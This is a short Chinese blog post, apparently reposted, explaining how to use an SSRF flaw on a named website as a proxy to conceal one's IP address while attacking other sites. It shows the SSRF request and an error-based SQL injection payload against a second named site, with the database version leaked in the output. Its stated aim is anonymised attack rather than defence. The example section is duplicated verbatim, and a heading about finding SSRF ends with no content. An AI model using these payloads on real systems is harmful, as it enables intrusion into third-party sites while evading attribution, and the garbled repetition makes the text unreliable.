利用ssrf 掩盖自己的ip地址,从而攻击其他网站
2015-10-29 14:09
417 查看
如果直接访问 http://www.ip.cn/ 就可以知道自己的ip地址,这样直接攻击网站就会暴露自己,但是,如果用ssrf这个漏洞,就可以用远程的服务器做代理去攻击其他网站
例子:
如果你这样访问http://qjjz.net/newsweb/news.shtml?url=http://www.ip.cn
查看源代码,你会发现你的ip变成了,
当前 IP:124.40.116.24 来自:北京市 飞华领航科技
这样你攻击一个网站比如:
http://qjjz.net/newsweb/news.shtml?url=http://www.hexie.com/main/articleDetail.php?id=757' and extractvalue(1, concat(0x5c,version())) %2523
显示出来的信息是:
MySQL Query Error:select * from knowledge where id='757' and extractvalue(1, concat(0x5c,version())) #':XPATH syntax error: '\5.5.20'
和自己直接注入是一样的
如何寻找ssrf漏洞
在对功能上存在SSRF漏洞中URL地址特征的观察,大致有以下关键字:
例子:
如果你这样访问http://qjjz.net/newsweb/news.shtml?url=http://www.ip.cn
查看源代码,你会发现你的ip变成了,
当前 IP:124.40.116.24 来自:北京市 飞华领航科技
这样你攻击一个网站比如:
http://qjjz.net/newsweb/news.shtml?url=http://www.hexie.com/main/articleDetail.php?id=757' and extractvalue(1, concat(0x5c,version())) %2523
显示出来的信息是:
MySQL Query Error:select * from knowledge where id='757' and extractvalue(1, concat(0x5c,version())) #':XPATH syntax error: '\5.5.20'
和自己直接注入是一样的
如何寻找ssrf漏洞
在对功能上存在SSRF漏洞中URL地址特征的观察,大致有以下关键字:
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 一个分布式服务器集群架构方案
- 同时看过 unreal4 和 Unity 源代码的人觉得哪个引擎架构更好?
- 如何判断是否需要升级网站服务器带宽
- OOD软件架构设计原则
- tornado 学习笔记5 构建Tornado网站应用
- c#三层架构登陆实例
- 网站页面在浏览器中设置样式格式。
- 不为技术而技术:大型网站架构演化解析
- 58同城沈剑:好的架构不是设计出来的,而是演进出来的
- Hexagon SDK架构分析
- 网站广告收入反正要发动群众的力量,来创造利润--小黄人软件
- JSP网站
- hadoop2整体架构
- .net大型分布式电子商务架构说明
- 网站开发进阶(七)**网站访问综合问题分析
- 网站开发进阶(七)**网站访问综合问题分析
- 谈谈 watchOS 2:架构变化和开发注意事项
- 美国军方网站还在用老旧的 SHA-1 证书
- Hadoop核心架构HDFS+MapReduce+Hbase+Hive内部机理详解
- php抓取网站图片并保存的实现方法